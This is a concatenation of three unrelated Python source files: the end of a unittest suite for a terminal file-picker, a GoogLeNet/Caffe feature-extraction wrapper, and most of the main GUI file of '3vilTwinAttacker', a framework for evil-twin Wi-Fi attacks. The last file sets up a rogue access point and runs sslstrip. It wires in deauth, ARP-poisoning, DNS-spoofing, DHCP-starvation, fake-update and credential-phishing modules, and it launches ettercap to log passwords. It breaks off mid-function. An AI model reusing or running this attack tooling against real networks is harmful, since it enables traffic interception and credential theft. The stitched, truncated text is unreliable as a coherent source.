'validateFileExists': False,
'inputs': ['DOWN', 'f', 'f', 'f', 'UP'],
'screenConfig': {
'maxX': 201,
'maxY': 40
},
'pastScreens': [0, 1, 2, 3, 4]
}, {
'name': 'longFileTruncation',
'input': 'superLongFileNames.txt',
'withAttributes': True,
'inputs': ['DOWN', 'f'],
'screenConfig': {
'maxX': 60,
'maxY': 20
},
}, {
'name': 'xModeWithSelect',
'input': 'gitDiff.txt',
'withAttributes': True,
'inputs': ['x', 'E', 'H'],
}, {
'name': 'gitAbbreivatedFiles',
'input': 'gitAbbreviatedFiles.txt',
'withAttributes': True,
'inputs': ['f', 'j'],
}]
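# Each entry above is a dict consumed by testScreenInputs below; keys other
# than 'name' are optional and fall back to the defaults used in the
# screenTestRunner.getRowsFromScreenRun call: 'input' (fixture file, default
# 'gitDiff.txt'), 'inputs' (keystrokes sent before the automatic trailing 'q'),
# 'screenConfig', 'withAttributes', 'pastScreen'/'pastScreens', 'args' and
# 'validateFileExists'.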
class TestScreenLogic(unittest.TestCase):
def testScreenInputs(self):
seenCases = {}
for testCase in screenTestCases:
# make sure the test name is not copy-pasted
testName = testCase['name']
self.assertFalse(
seenCases.get(testName, False), 'Already seen %s ' % testName)
seenCases[testName] = True
charInputs = ['q'] # we always quit at the end
charInputs = testCase.get('inputs', []) + charInputs
screenData = screenTestRunner.getRowsFromScreenRun(
inputFile=testCase.get('input', 'gitDiff.txt'),
charInputs=charInputs,
screenConfig=testCase.get('screenConfig', {}),
printScreen=False,
pastScreen=testCase.get('pastScreen', None),
pastScreens=testCase.get('pastScreens', None),
args=testCase.get('args', []),
validateFileExists=testCase.get('validateFileExists', False)
)
self.compareToExpected(testCase, testName, screenData)
print('Tested %s ' % testName)
def compareToExpected(self, testCase, testName, screenData):
TestScreenLogic.maybeMakeExpectedDir()
(actualLines, actualAttributes) = screenData
if testCase.get('withAttributes', False):
self.compareLinesAndAttributesToExpected(testName, screenData)
else:
self.compareLinesToExpected(testName, actualLines)
def compareLinesAndAttributesToExpected(self, testName, screenData):
(actualLines, actualAttributes) = screenData
actualMergedLines = []
for actualLine, attributeLine in zip(actualLines, actualAttributes):
actualMergedLines.append(actualLine)
actualMergedLines.append(attributeLine)
self.outputIfNotFile(testName, '\n'.join(actualMergedLines))
file = open(TestScreenLogic.getExpectedFile(testName))
expectedMergedLines = file.read().split('\n')
file.close()
self.assertEqualLines(testName, actualMergedLines, expectedMergedLines)
def compareLinesToExpected(self, testName, actualLines):
self.outputIfNotFile(testName, '\n'.join(actualLines))
file = open(TestScreenLogic.getExpectedFile(testName))
expectedLines = file.read().split('\n')
file.close()
self.assertEqualLines(testName, actualLines, expectedLines)
def outputIfNotFile(self, testName, output):
expectedFile = TestScreenLogic.getExpectedFile(testName)
if os.path.isfile(expectedFile):
return
print('Could not find file %s so outputting...' % expectedFile)
file = open(expectedFile, 'w')
file.write(output)
file.close()
self.fail(
'File outputted, please inspect %s for correctness' % expectedFile)
def assertEqualNumLines(self, testName, actualLines, expectedLines):
self.assertEqual(
len(actualLines),
len(expectedLines),
'%s test: Actual lines was %d but expected lines was %d' % (
testName, len(actualLines), len(expectedLines)),
)
def assertEqualLines(self, testName, actualLines, expectedLines):
self.assertEqualNumLines(testName, actualLines, expectedLines)
expectedFile = TestScreenLogic.getExpectedFile(testName)
for index, expectedLine in enumerate(expectedLines):
actualLine = actualLines[index]
self.assertEqual(
expectedLine,
actualLine,
'Lines did not match for test %s:\n\nExpected:"%s"\nActual :"%s"' % (
expectedFile, expectedLine, actualLine),
)
@staticmethod
def getExpectedFile(testName):
return os.path.join(EXPECTED_DIR, testName + '.txt')
@staticmethod
def maybeMakeExpectedDir():
if not os.path.isdir(EXPECTED_DIR):
os.makedirs(EXPECTED_DIR)
if __name__ == '__main__':
unittest.main()
|
|
"""Parser for bvlc caffe googlenet."""
# Authors: Michael Eickenberg
# Kyle Kastner
# License: BSD 3 Clause
from sklearn.externals import joblib
from ...datasets import get_dataset_dir, download
from .caffemodel import _parse_caffe_model, parse_caffe_model
import os
from ...utils import check_tensor, get_minibatch_indices
from .googlenet_class_labels import get_googlenet_class_label
from .googlenet_layer_names import get_googlenet_layer_names
from sklearn.base import BaseEstimator, TransformerMixin
import theano
import numpy as np
GOOGLENET_PATH = get_dataset_dir("caffe/bvlc_googlenet")
def fetch_googlenet_protobuffer_file(caffemodel_file=None):
"""Checks for existence of caffemodel protobuffer.
Downloads it if it cannot be found."""
default_filename = os.path.join(GOOGLENET_PATH,
"bvlc_googlenet.caffemodel")
if caffemodel_file is not None:
if os.path.exists(caffemodel_file):
return caffemodel_file
else:
if os.path.exists(default_filename):
import warnings
warnings.warn('Did not find %s, but found and returned %s.' %
(caffemodel_file, default_filename))
return default_filename
else:
if os.path.exists(default_filename):
return default_filename
# We didn't find the file, so download it: to the specified location
# if given, otherwise to the default place
if caffemodel_file is None:
caffemodel_file = default_filename
if not os.path.exists(GOOGLENET_PATH):
os.makedirs(GOOGLENET_PATH)
url = "https://dl.dropboxusercontent.com/u/15378192/"
url += "bvlc_googlenet.caffemodel"
download(url, caffemodel_file, progress_update_percentage=1)
return caffemodel_file
def fetch_googlenet_architecture(caffemodel_parsed=None,
caffemodel_protobuffer=None):
"""Fetch a pickled version of the caffe model, represented as list of
dictionaries."""
default_filename = os.path.join(GOOGLENET_PATH, 'bvlc_googlenet.pickle')
if caffemodel_parsed is not None:
if os.path.exists(caffemodel_parsed):
return joblib.load(caffemodel_parsed)
else:
if os.path.exists(default_filename):
import warnings
warnings.warn('Did not find %s, but found %s. Loading it.' %
(caffemodel_parsed, default_filename))
return joblib.load(default_filename)
else:
if os.path.exists(default_filename):
return joblib.load(default_filename)
# We didn't find the file: let's create it by parsing the protobuffer
protobuf_file = fetch_googlenet_protobuffer_file(caffemodel_protobuffer)
model = _parse_caffe_model(protobuf_file)
if caffemodel_parsed is not None:
joblib.dump(model, caffemodel_parsed)
else:
joblib.dump(model, default_filename)
return model
def create_theano_expressions(model=None, verbose=0):
if model is None:
model = fetch_googlenet_architecture()
layers, blobs, inputs, params = parse_caffe_model(model, verbose=verbose)
data_input = inputs['data']
return blobs, data_input
def _get_fprop(output_layers=('loss3/loss3',), model=None, verbose=0):
if model is None:
model = fetch_googlenet_architecture(model)
expressions, input_data = create_theano_expressions(model,
verbose=verbose)
to_compile = [expressions[expr] for expr in output_layers]
return theano.function([input_data], to_compile)
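# Minimal sketch of how the compiled forward pass above can be used directly
# (assumes `batch` is a float32 array already transposed to (n, 3, 224, 224);
# the layer name is the default from the signature above):
#
#   fprop = _get_fprop(output_layers=('loss3/loss3',))
#   probabilities = fprop(batch)[0]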
class GoogLeNetTransformer(BaseEstimator, TransformerMixin):
"""
A transformer/feature extractor for images using GoogLeNet.
Parameters
----------
output_layers : iterable, optional (default=('loss3/classifier',))
Which layers to return. Can be used to retrieve multiple levels of
output with a single call to transform.
force_reshape : boolean, optional (default=True)
Whether or not to force the output to be two dimensional. If true,
this class can be used as part of a scikit-learn pipeline.
force_reshape currently only supports len(output_layers) == 1!
batch_size: int, optional (default=None)
Size of the minibatches to process. Setting this number can reduce
memory consumption or allow for processing of out-of-core data
such as HDF5 or numpy memmap files.
Default of None corresponds to no minibatches. This should
be faster but consumes more memory.
"""
layer_names = get_googlenet_layer_names()
def __init__(self, output_layers=('loss3/classifier',),
force_reshape=True, batch_size=None,
transpose_order=(0, 3, 1, 2)):
self.output_layers = output_layers
self.force_reshape = force_reshape
self.batch_size = batch_size
self.transpose_order = transpose_order
self.transform_function = _get_fprop(output_layers)
def fit(self, X, y=None):
"""Passthrough function for sklearn compatibility"""
return self
def transform(self, X):
"""
Transform a set of images.
Returns the features from each layer.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, n_features]
If force_reshape = False,
list of array-like, length output_layers,
each shape = [n_images, n_channels,
n_features]
Returns the features extracted for each of the n_images in X.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
def output(X):
if self.force_reshape:
return self.transform_function(X.transpose(
*self.transpose_order))[0].reshape((len(X), -1))
else:
return self.transform_function(X.transpose(
*self.transpose_order))
if self.batch_size is not None:
res = [output(X[i:j]) for i, j in get_minibatch_indices(
X, self.batch_size)]
if self.force_reshape is False:
# Need to stick layer outputs together before stacking...
return [np.vstack([res[i][idx] for i in range(len(res))])
for idx in range(len(res[0]))]
else:
return np.vstack(res)
else:
return output(X)
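# Usage sketch for the transformer above (assumes `images` is a float32 array
# of shape [n_images, height, width, 3] and that the caffemodel weights are
# available locally or can be downloaded):
#
#   transformer = GoogLeNetTransformer(output_layers=('loss3/classifier',))
#   features = transformer.transform(images)  # shape [n_images, n_features]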
class GoogLeNetClassifier(BaseEstimator):
"""
A classifier for cropped images using the GoogLeNet neural network.
Image will be cropped to center 224x224 pixels
Parameters
----------
top_n : integer, optional (default=5)
How many classes to return, based on sorted class probabilities.
output_strings : boolean, optional (default=True)
Whether to return class strings or integer classes. Returns class
strings by default.
Attributes
----------
crop_bounds_ : tuple, (x_left, x_right, y_lower, y_upper)
The coordinate boundaries of the cropping box used.
"""
min_size = (224, 224)
layer_names = get_googlenet_layer_names()
def __init__(self, top_n=5, large_network=False, output_strings=True,
transpose_order=(0, 3, 1, 2)):
self.top_n = top_n
self.large_network = large_network
self.output_strings = output_strings
self.transpose_order = transpose_order
self.transform_function = _get_fprop(('loss3/loss3',))
def fit(self, X, y=None):
"""Passthrough for scikit-learn pipeline compatibility."""
return self
def _predict_proba(self, X):
x_midpoint = X.shape[2] // 2
y_midpoint = X.shape[1] // 2
x_lower_bound = x_midpoint - self.min_size[0] // 2
if x_lower_bound <= 0:
x_lower_bound = 0
x_upper_bound = x_lower_bound + self.min_size[0]
y_lower_bound = y_midpoint - self.min_size[1] // 2
if y_lower_bound <= 0:
y_lower_bound = 0
y_upper_bound = y_lower_bound + self.min_size[1]
self.crop_bounds_ = (x_lower_bound, x_upper_bound, y_lower_bound,
y_upper_bound)
res = self.transform_function(
X[:, y_lower_bound:y_upper_bound,
x_lower_bound:x_upper_bound, :].transpose(
*self.transpose_order))[0]
return res
def predict(self, X):
"""
Classify a set of cropped input images.
Returns the top_n classes.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, top_n]
Returns the top_n classes for each of the n_images in X.
If output_strings is True, then the result will be string
description of the class label.
Otherwise, the returned values will be the integer class label.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
res = self._predict_proba(X)[:, :, 0, 0]
indices = np.argsort(res, axis=1)
indices = indices[:, -self.top_n:]
if self.output_strings:
class_strings = np.empty_like(indices,
dtype=object)
for index, value in enumerate(indices.flat):
class_strings.flat[index] = get_googlenet_class_label(value)
return class_strings
else:
return indices
def predict_proba(self, X):
"""
Prediction probability for a set of cropped input images.
Returns the top_n probabilities.
Parameters
----------
X : array-like, shape = [n_images, height, width, color]
or
shape = [height, width, color]
Returns
-------
T : array-like, shape = [n_images, top_n]
Returns the top_n probabilities for each of the n_images in X.
"""
X = check_tensor(X, dtype=np.float32, n_dim=4)
res = self._predict_proba(X)[:, :, 0, 0]
return np.sort(res, axis=1)[:, -self.top_n:]
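# Usage sketch for the classifier above (images are center-cropped to 224x224
# internally; `images` is assumed to be shaped [n_images, height, width, 3]):
#
#   clf = GoogLeNetClassifier(top_n=5)
#   labels = clf.predict(images)        # top-5 class label strings per image
#   probs = clf.predict_proba(images)   # top-5 sorted probabilities per image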
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from shutil import move
from sys import argv
import logging
from re import search
from multiprocessing import Process
from time import asctime
from subprocess import Popen,PIPE,STDOUT,call
from Modules.ModuleStarvation import frm_dhcp_main
from Modules.ModuleDeauth import frm_window,frm_deauth
from Modules.ModuleMacchanger import frm_mac_generator
from Modules.ModuleProbeRequest import frm_PMonitor
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleArpPosion import frm_Arp_Poison
from Modules.Credentials import frm_get_credentials,frm_NetCredsLogger
from Modules.ModuleDnsSpoof import frm_DnsSpoof
from Modules.utils import ProcessThread,Refactor,setup_logger,set_monitor_mode
from Core.Settings import frm_Settings
from Core.about import frmAbout
from twisted.web import http
from twisted.internet import reactor
from Plugins.sslstrip.StrippingProxy import StrippingProxy
from Plugins.sslstrip.URLMonitor import URLMonitor
from Plugins.sslstrip.CookieCleaner import CookieCleaner
from os import geteuid,system,path,getcwd,chdir,remove,popen,listdir
if search('/usr/share/',argv[0]):chdir('/usr/share/3vilTwinAttacker/')
author = ' @mh4x0f P0cl4bs Team'
emails = ['mh4root@gmail.com','p0cl4bs@gmail.com']
license = 'MIT License (MIT)'
version = '0.6.4'
date_create = '18/01/2015'
update = '27/07/2015'
desc = ['Framework for EvilTwin Attacks']
class Initialize(QMainWindow):
def __init__(self, parent=None):
super(Initialize, self).__init__(parent)
self.form_widget = SubMain(self)
self.config = frm_Settings()
self.setCentralWidget(self.form_widget)
self.setWindowTitle('3vilTwin-Attacker v' + version)
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def center(self):
frameGm = self.frameGeometry()
centerPoint = QDesktopWidget().availableGeometry().center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
def closeEvent(self, event):
m = popen('iwconfig').readlines()
self.interface = self.config.xmlSettings('interface', 'monitor_mode',None,False)
for i in m:
if search('Mode:Monitor',i):
reply = QMessageBox.question(self, 'About Exit','Are you sure you want to quit?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
set_monitor_mode(self.interface).setDisable()
else:
event.ignore()
class ThRunDhcp(QThread):
def __init__(self,args):
QThread.__init__(self)
self.args = args
self.process = None
def run(self):
print 'Starting Thread:' + self.objectName()
self.process = p = Popen(self.args,
stdout=PIPE,stderr=STDOUT)
setup_logger('dhcp', './Logs/dhcp.log')
loggerDhcp = logging.getLogger('dhcp')
loggerDhcp.info('---[ Start DHCP '+asctime()+']---')
for line,data in enumerate(iter(p.stdout.readline, b'')):
print data.rstrip()
if line > 4:
self.emit(SIGNAL('Activated( QString )'),data.rstrip())
loggerDhcp.info(data.rstrip())
def stop(self):
print 'Stop thread:' + self.objectName()
if self.process is not None:
self.process.terminate()
self.process = None
class Threadsslstrip(QThread):
def __init__(self,port):
QThread.__init__(self)
self.port = port
def run(self):
print 'Starting Thread:' + self.objectName()
listenPort = self.port
spoofFavicon = False
killSessions = True
print 'SSLstrip v0.9 by Moxie Marlinspike Thread::online'
URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
CookieCleaner.getInstance().setEnabled(killSessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(int(listenPort), strippingFactory)
reactor.run(installSignalHandlers=False)
def stop(self):
print 'Stop thread:' + self.objectName()
try:
reactor.stop()
except:pass
class SubMain(QWidget):
def __init__(self, parent = None):
super(SubMain, self).__init__(parent)
#self.create_sys_tray()
self.Main = QVBoxLayout()
self.config = frm_Settings()
self.module_arp = frm_Arp_Poison()
self.interface = 'None'
self.thread = []
self.Apthreads = {'RougeAP': []}
self.MonitorImport = frm_deauth()
self.PortRedirect = None
self.Ap_iface = None
self.setGeometry(0, 0, 300, 400)
self.FSettings = frm_Settings()
self.intGUI()
def intGUI(self):
self.myQMenuBar = QMenuBar(self)
self.myQMenuBar.setFixedWidth(400)
self.StatusBar = QStatusBar()
self.StatusBar.setFixedHeight(15)
self.StatusBar.addWidget(QLabel("::Access|Point::"))
self.StatusDhcp = QLabel("")
self.Started(False)
Menu_file = self.myQMenuBar.addMenu('&File')
exportAction = QAction('exportToHtml', self)
deleteAction = QAction('Clear Logger', self)
exitAction = QAction('Exit', self)
exitAction.setIcon(QIcon('rsc/close-pressed.png'))
deleteAction.setIcon(QIcon('rsc/delete.png'))
exportAction.setIcon(QIcon('rsc/export.png'))
Menu_file.addAction(exportAction)
Menu_file.addAction(deleteAction)
Menu_file.addAction(exitAction)
exitAction.triggered.connect(exit)
deleteAction.triggered.connect(self.delete_logger)
exportAction.triggered.connect(self.exportHTML)
Menu_View = self.myQMenuBar.addMenu('&View')
phishinglog = QAction('Credentials Phishing', self)
netcredslog = QAction('Credentials NetCreds', self)
#connect
phishinglog.triggered.connect(self.credentials)
netcredslog.triggered.connect(self.logsnetcreds)
#icons
phishinglog.setIcon(QIcon('rsc/password.png'))
netcredslog.setIcon(QIcon('rsc/logger.png'))
Menu_View.addAction(phishinglog)
Menu_View.addAction(netcredslog)
#tools Menu
Menu_tools = self.myQMenuBar.addMenu('&Tools')
ettercap = QAction('Active Ettercap', self)
btn_drift = QAction('Active DriftNet', self)
btn_drift.setShortcut('Ctrl+Y')
ettercap.setShortcut('Ctrl+E')
ettercap.triggered.connect(self.start_etter)
btn_drift.triggered.connect(self.start_dift)
# icons tools
ettercap.setIcon(QIcon('rsc/ettercap.png'))
btn_drift.setIcon(QIcon('rsc/capture.png'))
Menu_tools.addAction(ettercap)
Menu_tools.addAction(btn_drift)
#menu module
Menu_module = self.myQMenuBar.addMenu('&Modules')
btn_deauth = QAction('Deauth Attack', self)
btn_probe = QAction('Probe Request',self)
btn_mac = QAction('Mac Changer', self)
btn_dhcpStar = QAction('DHCP S. Attack',self)
btn_winup = QAction('Windows Update',self)
btn_arp = QAction('Arp Posion Attack',self)
btn_dns = QAction('Dns Spoof Attack',self)
action_settings = QAction('Settings',self)
# Shortcut modules
btn_deauth.setShortcut('Ctrl+W')
btn_probe.setShortcut('Ctrl+K')
btn_mac.setShortcut('Ctrl+M')
btn_dhcpStar.setShortcut('Ctrl+H')
btn_winup.setShortcut('Ctrl+N')
btn_dns.setShortcut('Ctrl+D')
btn_arp.setShortcut('Ctrl+Q')
action_settings.setShortcut('Ctrl+X')
#connect buttons
btn_probe.triggered.connect(self.showProbe)
btn_deauth.triggered.connect(self.formDauth)
btn_mac.triggered.connect(self.form_mac)
btn_dhcpStar.triggered.connect(self.show_dhcpDOS)
btn_winup.triggered.connect(self.show_windows_update)
btn_arp.triggered.connect(self.show_arp_posion)
btn_dns.triggered.connect(self.show_dns_spoof)
action_settings.triggered.connect(self.show_settings)
#icons Modules
btn_arp.setIcon(QIcon('rsc/arp_.png'))
btn_winup.setIcon(QIcon('rsc/arp.png'))
btn_dhcpStar.setIcon(QIcon('rsc/dhcp.png'))
btn_mac.setIcon(QIcon('rsc/mac.png'))
btn_probe.setIcon(QIcon('rsc/probe.png'))
btn_deauth.setIcon(QIcon('rsc/deauth.png'))
btn_dns.setIcon(QIcon('rsc/dns_spoof.png'))
action_settings.setIcon(QIcon('rsc/setting.png'))
# add modules menu
Menu_module.addAction(btn_deauth)
Menu_module.addAction(btn_probe)
Menu_module.addAction(btn_mac)
Menu_module.addAction(btn_dhcpStar)
Menu_module.addAction(btn_winup)
Menu_module.addAction(btn_arp)
Menu_module.addAction(btn_dns)
Menu_module.addAction(action_settings)
#menu extra
Menu_extra= self.myQMenuBar.addMenu('&Extra')
Menu_about = QAction('About',self)
Menu_help = QAction('Help',self)
#icons extra
Menu_about.setIcon(QIcon('rsc/about.png'))
Menu_help.setIcon(QIcon('rsc/report.png'))
Menu_about.triggered.connect(self.about)
Menu_extra.addAction(Menu_about)
self.EditGateway = QLineEdit(self)
self.EditApName = QLineEdit(self)
self.EditChannel = QLineEdit(self)
self.selectCard = QComboBox(self)
self.ListLoggerDhcp = QListWidget(self)
self.ListLoggerDhcp.setFixedHeight(150)
try:
self.EditGateway.setText([Refactor.get_interfaces()[x] for x in Refactor.get_interfaces().keys() if x == 'gateway'][0])
except:pass
self.EditApName.setText(self.config.xmlSettings('AP', 'name',None,False))
self.EditChannel.setText(self.config.xmlSettings('channel', 'mchannel',None,False))
self.PortRedirect = self.config.xmlSettings('redirect', 'port',None,False)
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search('wlan', j):
self.selectCard.addItem(n[i])
if not path.isfile('Modules/Templates/Windows_Update/Settins_WinUpdate.html'):
system('cp Settings/source.tar.gz Modules/Templates/')
system('cd Modules/Templates/ && tar -xf source.tar.gz')
remove('Modules/Templates/source.tar.gz')
driftnet = popen('which driftnet').read().split('\n')
ettercap = popen('which ettercap').read().split('\n')
dhcpd = popen('which dhcpd').read().split("\n")
dnsmasq = popen('which dnsmasq').read().split("\n")
lista = [ '/usr/sbin/airbase-ng', ettercap[0],driftnet[0],dhcpd[0],dnsmasq[0]]
self.m = []
for i in lista:self.m.append(path.isfile(i))
self.FormGroup1 = QFormLayout()
self.FormGroup2 = QFormLayout()
self.FormGroup3 = QFormLayout()
hLine = QFrame()
hLine.setFrameStyle(QFrame.HLine)
hLine.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
hLine2 = QFrame()
hLine2.setFrameStyle(QFrame.HLine)
hLine2.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
vbox = QVBoxLayout()
vbox.setMargin(5)
vbox.addStretch(20)
self.FormGroup1.addRow(vbox)
self.logo = QPixmap(getcwd() + '/rsc/logo.png')
self.imagem = QLabel()
self.imagem.setPixmap(self.logo)
self.FormGroup1.addRow(self.imagem)
self.GroupAP = QGroupBox()
self.GroupAP.setTitle('Access Point::')
self.FormGroup3.addRow('Gateway:', self.EditGateway)
self.FormGroup3.addRow('AP Name:', self.EditApName)
self.FormGroup3.addRow('Channel:', self.EditChannel)
self.GroupAP.setLayout(self.FormGroup3)
# grid network adapter fix
self.btrn_refresh = QPushButton('Refresh')
self.btrn_refresh.setIcon(QIcon('rsc/refresh.png'))
self.btrn_refresh.clicked.connect(self.refresh_interface)
self.layout = QFormLayout()
self.GroupAdapter = QGroupBox()
self.GroupAdapter.setTitle('Network Adapter::')
self.layout.addRow(self.selectCard)
self.layout.addRow(self.btrn_refresh)
self.GroupAdapter.setLayout(self.layout)
self.btn_start_attack = QPushButton('Start Attack', self)
self.btn_start_attack.setIcon(QIcon('rsc/start.png'))
self.btn_cancelar = QPushButton('Stop Attack', self)
self.btn_cancelar.setIcon(QIcon('rsc/Stop.png'))
self.btn_cancelar.clicked.connect(self.kill)
self.btn_start_attack.clicked.connect(self.StartApFake)
hBox = QHBoxLayout()
hBox.addWidget(self.btn_start_attack)
hBox.addWidget(self.btn_cancelar)
self.slipt = QHBoxLayout()
self.slipt.addWidget(self.GroupAP)
self.slipt.addWidget(self.GroupAdapter)
self.FormGroup2.addRow(hBox)
self.FormGroup2.addRow(self.ListLoggerDhcp)
self.FormGroup2.addRow(self.StatusBar)
self.Main.addLayout(self.FormGroup1)
self.Main.addLayout(self.slipt)
self.Main.addLayout(self.FormGroup2)
self.setLayout(self.Main)
def show_arp_posion(self):
self.Farp_posion = frm_Arp_Poison()
self.Farp_posion.setGeometry(0, 0, 450, 300)
self.Farp_posion.show()
def show_settings(self):
self.FSettings.show()
def show_windows_update(self):
self.FWinUpdate = frm_update_attack()
self.FWinUpdate.setGeometry(QRect(100, 100, 450, 300))
self.FWinUpdate.show()
def show_dhcpDOS(self):
self.Fstar = frm_dhcp_main()
self.Fstar.setGeometry(QRect(100, 100, 450, 200))
self.Fstar.show()
def showProbe(self):
self.Fprobe = frm_PMonitor()
self.Fprobe.setGeometry(QRect(100, 100, 400, 200))
self.Fprobe.show()
def formDauth(self):
self.Fdeauth = frm_window()
self.Fdeauth.setGeometry(QRect(100, 100, 200, 200))
self.Fdeauth.show()
def form_mac(self):
self.Fmac = frm_mac_generator()
self.Fmac.setGeometry(QRect(100, 100, 300, 100))
self.Fmac.show()
def show_dns_spoof(self):
self.Fdns = frm_DnsSpoof()
self.Fdns.setGeometry(QRect(100, 100, 450, 300))
self.Fdns.show()
def credentials(self):
self.Fcredentials = frm_get_credentials()
self.Fcredentials.setWindowTitle('Get credentials Phishing')
self.Fcredentials.show()
def logsnetcreds(self):
self.FnetCreds = frm_NetCredsLogger()
self.FnetCreds.setWindowTitle('NetCreds Logger')
self.FnetCreds.show()
def Started(self,bool):
if bool:
self.StatusDhcp.setText("[ON]")
self.StatusDhcp.setStyleSheet("QLabel { color : green; }")
else:
self.StatusDhcp.setText("[OFF]")
self.StatusDhcp.setStyleSheet("QLabel { color : red; }")
self.StatusBar.addWidget(self.StatusDhcp)
def dhcpLog(self,log):
self.ListLoggerDhcp.addItem(log)
self.ListLoggerDhcp.scrollToBottom()
def exportHTML(self):
contents = Refactor.exportHtml()
filename = QFileDialog.getSaveFileNameAndFilter(self,
"Save File Logger HTML","report.html","HTML (*.html)")
if len(filename) != 0:
with open(str(filename[0]),'w') as filehtml:
filehtml.write(contents),filehtml.close()
def refresh_interface(self):
self.selectCard.clear()
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search('wlan', j):
self.selectCard.addItem(n[i])
def kill(self):
if self.Apthreads['RougeAP'] == []:return
for i in self.Apthreads['RougeAP']:i.stop()
terminate = [
'killall dhcpd',
'killall dnsmasq',
'killall xterm',
'iptables --flush',
'iptables --table nat --flush',
'iptables --delete-chain',
'iptables --table nat --delete-chain']
for delete in terminate:popen(delete)
set_monitor_mode(self.interface).setDisable()
self.Started(False)
Refactor.set_ip_forward(0)
self.ListLoggerDhcp.clear()
def delete_logger(self):
if listdir('Logs'):
resp = QMessageBox.question(self, 'About Delete Logger',
'Do you want to delete the logs?',QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if resp == QMessageBox.Yes:
system('rm Logs/*.cap')
system('rm Logs/*.log')
def start_etter(self):
if self.m[1]:
if search(self.Ap_iface,str(popen('ifconfig').read())):
call(['sudo', 'xterm', '-geometry', '73x25-1+50',
'-T', 'ettercap', '-s', '-sb', '-si', '+sk', '-sl',
'5000', '-e', 'ettercap', '-p', '-u', '-T', '-q', '-w',
'Logs/passwords', '-i', self.Ap_iface])
else:
QMessageBox.information(self,'ettercap','ettercap not found.')
def start_dift(self):
if self.m[2]:
if search(self.Ap_iface,str(popen('ifconfig').read())):
call(['sudo', 'xterm', '-geometry', '75x15+1+200',
'-T', 'DriftNet', '-e', 'driftnet', '-i', self.Ap_iface])
else:
QMessageBox.information(self,'driftnet','driftnet not found.')
def CoreSettings(self):
range_dhcp = self.config.xmlSettings('Iprange', 'range',None,False)
self.PortRedirect = self.config.xmlSettings('redirect', 'port',None,False)
self.SettingsAP = {
'interface':
[
'ifconfig %s up'%(self.Ap_iface),
'ifconfig %s 10.0.0.1 netmask 255.255.255.0'%(self.Ap_iface),
'ifconfig %s mtu 1400'%(self.Ap_iface),
'route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1'
],
'kill':
[
'iptables --flush',
'iptables --table nat --flush',
'iptables --delete-chain',
'iptables --table nat --delete-chain',
'killall dhcpd',
'killall dnsmasq'
],
'dhcp-server':
[
'authoritative;\n',
'default-lease-time 600;\n',
'max-lease-time 7200;\n',
'subnet 10.0.0.0 netmask 255.255.255.0 {\n',
'option routers 10.0.0.1;\n',
'option subnet-mask 255.255.255.0;\n',
'option domain-name \"%s\";\n'%(str(self.EditApName.text())),
'option domain-name-servers 10.0.0.1;\n',
'range %s;\n'% range_dhcp,
'}',
],
'dnsmasq':
[
'interface=%s\n'%(self.Ap_iface),
'dhcp-range=10.0.0.10,10.0.0.50,12h\n',
'server=8.8.8.8\n',
'server=8.8.4.4\n',
]
}
Refactor.set_ip_forward(1)
for i in self.SettingsAP['interface']:popen(i)
for i in self.SettingsAP['kill']:popen(i)
dhcp_select = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if dhcp_select != 'dnsmasq':
with open('Settings/dhcpd.conf','w') as dhcp:
for i in self.SettingsAP['dhcp-server']:
dhcp.write(i)
dhcp.close()
if path.isfile('/etc/dhcp/dhcpd.conf'):
system('rm /etc/dhcp/dhcpd.conf')
move('Settings/dhcpd.conf', '/etc/dhcp/')
else:
with open('Settings/dnsmasq.conf','w') as dhcp:
for i in self.SettingsAP['dnsmasq']:
dhcp.write(i)
dhcp.close()
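# For reference, with a hypothetical Ap_iface of 'at0' and the default
# 10.0.0.x addressing above, the generated Settings/dnsmasq.conf would read:
#
#   interface=at0
#   dhcp-range=10.0.0.10,10.0.0.50,12h
#   server=8.8.8.8
#   server=8.8.4.4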
def StartApFake(self):
self.ListLoggerDhcp.clear()
if geteuid() != 0:
QMessageBox.warning(self,'Error permission','Run as root ')
return
if len(self.selectCard.currentText()) == 0:
QMessageBox.warning(self,'Error interface','Network interface not supported :(')
return
dhcp_select = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if dhcp_select != 'dnsmasq':
if not self.m[3]:
